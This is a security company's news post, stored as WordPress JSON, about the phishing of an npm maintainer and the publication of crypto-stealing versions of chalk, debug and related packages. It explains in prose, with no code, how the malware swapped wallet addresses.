{"id":54483,"date":"2026-01-14T11:19:43","date_gmt":"2026-01-14T10:19:43","guid":{"rendered":"https:\/\/cyberant.com\/large-scale-attack-on-popular-npm-packages-millions-of-websites-and-apps-potentially-affected\/"},"modified":"2026-01-14T11:19:43","modified_gmt":"2026-01-14T10:19:43","slug":"large-scale-attack-on-popular-npm-packages-millions-of-websites-and-apps-potentially-affected","status":"publish","type":"post","link":"https:\/\/cyberant.com\/en\/large-scale-attack-on-popular-npm-packages-millions-of-websites-and-apps-potentially-affected\/","title":{"rendered":"Large-scale attack on popular npm packages: millions of websites and apps potentially affected"},"content":{"rendered":"<p data-start=\"424\" data-end=\"810\">Several widely used npm-packages (software building blocks) have been infected with malicious code. This happened after a successful phishing attack on one of the administrators of these building blocks. An npm-package is a building block that developers can use in their software so they don&#8217;t have to reprogram frequently used components every time. As a result, building blocks end up everywhere: in custom software as well as in standard products. Together, the infected components are downloaded and used more than 2 billion times a week by developers worldwide.    <\/p>\n<h2 data-start=\"1475\" data-end=\"1502\">Phishing<\/h2>\n<p data-start=\"1503\" data-end=\"1638\">The attackers gained access to the repository through a phishing email. The attack targeted Josh Junon (also known as Qix), a developer who is co-manager of several popular packages. Qix has the rights to add and approve new code, making his account sufficient to spread this malware.  <\/p>\n<p>Junon received a phishing email that looked very much like it came from npm itself, telling him to renew his two-step authentication (2FA) via a link before Sept. 10, 2025. When he followed this link, he was taken to a fake website where he entered his username, password and 2FA code. This data was immediately intercepted by criminals through a so-called <em data-start=\"399\" data-end=\"424\">Adversary-in-the-Middle attack<\/em>, which allowed them to gain access to his account. With that access, the attackers were then able to publish infected versions of twenty popular packages in the official npm library.   <\/p>\n<p>On BlueSky <a href=\"https:\/\/bsky.app\/profile\/bad-at-computer.bsky.social\/post\/3lydioq5swk2y\">, Junon responded<\/a>, &#8220;Sorry everyone, I should have paid more attention. Not like me; have had a stressful week. Will work to get this cleaned up.&#8221;<\/p>\n<h2 data-start=\"2269\" data-end=\"2305\">Which packages are affected?<\/h2>\n<p data-start=\"2306\" data-end=\"2378\">Among others, the following NPM packages contain temporarily malicious code:<\/p>\n<ul data-start=\"2380\" data-end=\"2701\">\n<li data-start=\"2380\" data-end=\"2458\">\n<p data-start=\"2382\" data-end=\"2458\">chalk (widely used to display text in color in software tools)<\/p>\n<\/li>\n<li data-start=\"2459\" data-end=\"2507\">\n<p data-start=\"2461\" data-end=\"2507\">debug (widely used for debugging)<\/p>\n<\/li>\n<li data-start=\"2508\" data-end=\"2614\">\n<p data-start=\"2510\" data-end=\"2614\">ansi-regex, ansi-styles, wrap-ansi, strip-ansi (components that work with text formatting)<\/p>\n<\/li>\n<li data-start=\"2615\" data-end=\"2701\">\n<p data-start=\"2617\" data-end=\"2701\">color-convert, color-string, color-name (for color management in software)<\/p>\n<\/li>\n<\/ul>\n<p data-start=\"2703\" data-end=\"2884\">Together, these packages account for two billion downloads per week. Because they are often reused as building blocks in other packages, the infection was able to spread widely. <\/p>\n<h2 data-start=\"2891\" data-end=\"2926\">Especially risk for crypo providers<\/h2>\n<p data-start=\"2927\" data-end=\"3009\">Analysis of the malware revealed that it was designed to steal cryptocurrency. The malicious code began by checking if it was running in a browser, then hooked into functions such as <em data-start=\"120\" data-end=\"134\">window.fetch<\/em>, <em data-start=\"136\" data-end=\"152\">XMLHttpRequest<\/em> and <em data-start=\"156\" data-end=\"181\">window.ethereum.request.<\/em> These are components that websites use to exchange data and control crypto-wallets. This allowed the code to imperceptibly replace the recipient&#8217;s wallet address with that of the attacker during a payment, with the forged address resembling the original and therefore barely noticeable.  <\/p>\n<p data-start=\"4100\" data-end=\"4287\">This type of attack comes under the heading of software supply chain attack. A supply chain attack involves attacking not the end user directly, but a link in the software supply chain. Similar attacks have been seen before, for example through typosquatting (offering a package with a nearly the same name as a popular package) or through slopsquatting (capitalizing on mistakes made by AI systems that recommend incorrect package names).  <\/p>\n<p>In this case, the malware specifically targets developers offering crypto-related services, so most software is unlikely to be affected even if it is infected.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Several widely used npm-packages (software building blocks) have been infected with malicious code. This happened after a successful phishing attack on one of the administrators of these building blocks. An npm-package is a building block that developers can use in their software so they don&#8217;t have to reprogram frequently used components every time. As a [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":54364,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[223],"tags":[183,190,335,188],"class_list":["post-54483","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news-en","tag-cyberaanval-en","tag-datalekken-en","tag-supply-chain-attack","tag-vulnerability-management-en"],"_links":{"self":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/posts\/54483","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/comments?post=54483"}],"version-history":[{"count":0,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/posts\/54483\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/media\/54364"}],"wp:attachment":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/media?parent=54483"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/categories?post=54483"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/tags?post=54483"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}